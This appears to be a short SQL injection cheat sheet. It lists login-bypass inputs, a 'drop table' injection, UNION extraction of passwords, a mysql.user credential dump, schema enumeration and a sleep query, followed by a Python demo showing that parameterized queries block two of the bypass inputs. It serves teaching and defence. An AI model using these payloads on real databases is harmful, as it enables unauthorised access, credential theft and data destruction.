Question: What is an SQL Injection Cheat Sheet?
An SQL injection cheat sheet is a resource in which you can find
detailed technical information about the many different variants of the SQL Injection vulnerability.
Question: Give a few examples from an SQL injection cheat sheet.
#1 - Insert a comment marker into the query so that the rest of the query is commented out.
Normal Query
SELECT * FROM members WHERE email = 'adminuser' AND password = 'password';
Tampered Query
SELECT * FROM members WHERE email = 'adminuser'-- AND password = 'password';
(This query checks the email only; the password condition is commented out.)
#2 - Insert an inline comment in the middle of a query
SELECT id,/* comment here*/ email FROM members WHERE 1
#3 - SQL injection that deletes a table
SELECT id, email FROM members WHERE email="arun@example.com" ; drop table users
#4 - UNION injection: try to retrieve data from another table
SELECT id, email FROM members WHERE email="arun@example.com" union select email,password from members
#5 - Bypassing login screens: logging in without authenticating by modifying the SQL through injection
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
#6 - Get all MySQL users with their passwords
SELECT User,Password FROM mysql.user;
#7 - Get the MySQL version
SELECT @@version
#8 - Get all MySQL tables
SELECT * FROM information_schema.tables
#9 - Sleep query
SELECT 10,sleep(100)
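Why the inputs in #1 and #5 work, and what stops them, shown as an added example that is not part of the original page: the same login check built by string concatenation and with bound parameters. It assumes an in-memory SQLite database standing in for MySQL; the function names and sample row are hypothetical.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the page's members table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    # Plaintext password only mirrors the page's query; real systems store a salted hash.
    db.execute("INSERT INTO members (email, password) VALUES ('adminuser', 'S3cret-constructed')")
    return db

def login_concatenated(db, email, password):
    """Vulnerable form: user input is pasted into the SQL text and parsed as syntax."""
    sql = ("SELECT id FROM members WHERE email = '" + email +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, email, password):
    """Hardened form: placeholders bind input as data, so quotes and comment markers stay literal."""
    sql = "SELECT id FROM members WHERE email = ? AND password = ?"
    return db.execute(sql, (email, password)).fetchone() is not None

def compare(email, password):
    """Return (concatenated_result, parameterized_result) for one login attempt."""
    db = make_db()
    try:
        return (login_concatenated(db, email, password),
                login_parameterized(db, email, password))
    finally:
        db.close()

if __name__ == "__main__":
    # Constructed attempts: valid login, wrong password, and two inputs from list #5.
    attempts = [
        ("adminuser", "S3cret-constructed"),
        ("adminuser", "wrong"),
        ("adminuser' --", "wrong"),
        ("' or 1=1--", "x"),
    ]
    for email, password in attempts:
        concat_ok, param_ok = compare(email, password)
        print(f"{email!r:18} concatenated={concat_ok!s:5} parameterized={param_ok}")
```

With bound parameters the two injected inputs are compared as literal email strings and match no row, while the concatenated query accepts both.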